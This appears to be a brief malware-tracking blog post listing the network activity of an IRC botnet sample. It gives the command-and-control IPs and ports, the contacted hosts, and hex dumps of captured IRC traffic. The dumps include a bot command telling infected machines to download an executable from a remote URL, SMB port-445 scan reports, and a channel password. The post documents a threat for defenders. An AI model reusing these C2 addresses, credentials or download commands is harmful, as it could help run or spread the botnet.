209.90.137.222(botnet hosted in Canada London Affilinet Corporation)

Remote Host Port Number
123.183.217.32 8300 ircd here
00000000 | 7273 7372 206D 6676 6C74 6874 786D 2022 | rssr mfvlthtxm “
00000010 | 2220 2222 2222 203A 6D66 766C 7468 7478 | ” “””” :mfvlthtx
00000020 | 6D0A 4B43 494B 204E 2D7C 307C 5850 5F6D | m.KCIK N-|0|XP_m
00000030 | 6676 6C74 6874 786D 0A | fvlthtxm.

173.241.242.7 80

184.73.184.162 80

194.28.44.212 80

195.14.112.153 80

204.0.5.49 80

204.0.5.50 80

50.18.125.54 80

50.22.198.84 80

64.111.199.221 80

64.111.199.222 80

209.90.137.222 1199

60.190.223.125 6943 ircd here
00000000 | 7365 6E64 2023 6A2C 234D 6120 6F6F 6F6F | send #j,#Ma oooo
00000010 | 0D0A 5052 5256 4D53 4720 2369 203A 4854 | ..PRRVMSG #i :HT
00000020 | 5450 2053 4554 2068 7474 703A 2F2F 7368 | TP SET http://sh
00000030 | 6974 2E73 6A68 6634 6768 2E6E 6574 2F73 | it.sjhf4gh.net/s
00000040 | 6D73 2E65 7865 0D0A 5052 5256 4D53 4720 | ms.exe..PRRVMSG
00000050 | 5B4E 3030 5F55 5341 5F58 505F 3937 3932 | [N00_USA_XP_9792
00000060 | BCB9 4020 3A20 5261 6E64 6F6D 2050 6F72 | ..@ : Random Por
00000070 | 7420 5363 616E 2073 7461 7274 6564 206F | t Scan started o
00000080 | 6E20 3137 342E 782E 782E 783A 3434 3520 | n 174.x.x.x:445
00000090 | 7769 7468 2061 2064 656C 6179 206F 6620 | with a delay of
000000A0 | 3520 7365 636F 6E64 7320 666F 7220 3020 | 5 seconds for 0
000000B0 | 6D69 6E75 7465 7320 7573 696E 6720 3235 | minutes using 25
000000C0 | 2074 6872 6561 6473 2E0D 0A50 5252 564D | threads…PRRVM
000000D0 | 5347 205B 4E30 305F 5553 415F 5850 5F39 | SG [N00_USA_XP_9
000000E0 | 3739 32BC B940 203A 2052 616E 646F 6D20 | 792..@ : Random
000000F0 | 506F 7274 2053 6361 6E20 7374 6172 7465 | Port Scan starte
00000100 | 6420 6F6E 2031 3734 2E31 3333 2E78 2E78 | d on 174.133.x.x
00000110 | 3A34 3435 2077 6974 6820 6120 6465 6C61 | :445 with a dela
00000120 | 7920 6F66 2035 2073 6563 6F6E 6473 2066 | y of 5 seconds f
00000130 | 6F72 2030 206D 696E 7574 6573 2075 7369 | or 0 minutes usi
00000140 | 6E67 2032 3520 7468 7265 6164 732E 0D0A | ng 25 threads…
00000150 | 5052 5256 4D53 4720 5B4E 3030 5F55 5341 | PRRVMSG [N00_USA
00000160 | 5F58 505F 3937 3932 BCB9 4020 3A20 5365 | _XP_9792..@ : Se
00000170 | 7175 656E 7469 616C 2050 6F72 7420 5363 | quential Port Sc
00000180 | 616E 2073 7461 7274 6564 206F 6E20 3139 | an started on 19
00000190 | 322E 3136 382E 302E 303A 3434 3520 7769 | 2.168.0.0:445 wi
000001A0 | 7468 2061 2064 656C 6179 206F 6620 3520 | th a delay of 5
000001B0 | 7365 636F 6E64 7320 666F 7220 3020 6D69 | seconds for 0 mi
000001C0 | 6E75 7465 7320 7573 696E 6720 3230 2074 | nutes using 20 t
000001D0 | 6872 6561 6473 2E0D 0A50 5252 564D 5347 | hreads…PRRVMSG
000001E0 | 205B 4E30 305F 5553 415F 5850 5F39 3739 | [N00_USA_XP_979
000001F0 | 32BC B940 203A 2053 6571 7565 6E74 6961 | 2..@ : Sequentia
00000200 | 6C20 506F 7274 2053 6361 6E20 7374 6172 | l Port Scan star
00000210 | 7465 6420 6F6E 2031 3932 2E31 3638 2E31 | ted on 192.168.1
00000220 | 3630 2E30 3A34 3435 2077 6974 6820 6120 | 60.0:445 with a
00000230 | 6465 6C61 7920 6F66 2035 2073 6563 6F6E | delay of 5 secon
00000240 | 6473 2066 6F72 2030 206D 696E 7574 6573 | ds for 0 minutes
00000250 | 2075 7369 6E67 2032 3020 7468 7265 6164 | using 20 thread
00000260 | 732E 0D0A 5052 5256 4D53 4720 5B4E 3030 | s…PRRVMSG [N00
00000270 | 5F55 5341 5F58 505F 3937 3932 BCB9 4020 | _USA_XP_9792..@
00000280 | 3A20 5365 7175 656E 7469 616C 2050 6F72 | : Sequential Por
00000290 | 7420 5363 616E 2073 7461 7274 6564 206F | t Scan started o
000002A0 | 6E20 3139 322E 302E 302E 303A 3434 3520 | n 192.0.0.0:445
000002B0 | 7769 7468 2061 2064 656C 6179 206F 6620 | with a delay of
000002C0 | 3520 7365 636F 6E64 7320 666F 7220 3020 | 5 seconds for 0
000002D0 | 6D69 6E75 7465 7320 7573 696E 6720 3130 | minutes using 10
000002E0 | 2074 6872 6561 6473 2E0D 0A50 4153 5320 | threads…PASS
000002F0 | 6C61 6F72 6F73 720D 0A4B 4349 4B20 5B4E | laorosr..KCIK [N
00000300 | 3030 5F55 5341 5F58 505F 3937 3932 3633 | 00_USA_XP_979263
00000310 | 335D 18E7 400D 0A72 7373 7220 5350 322D | 3]..@..rssr SP2-
00000320 | 3337 3820 2A20 3020 3A43 4F4D 5055 5445 | 378 * 0 :COMPUTE
00000330 | 524E 414D 450D 0A | RNAME..

65.55.92.136 25

infos about hosting:
http://whois.domaintools.com/209.90.137.222

Categories: Uncategorized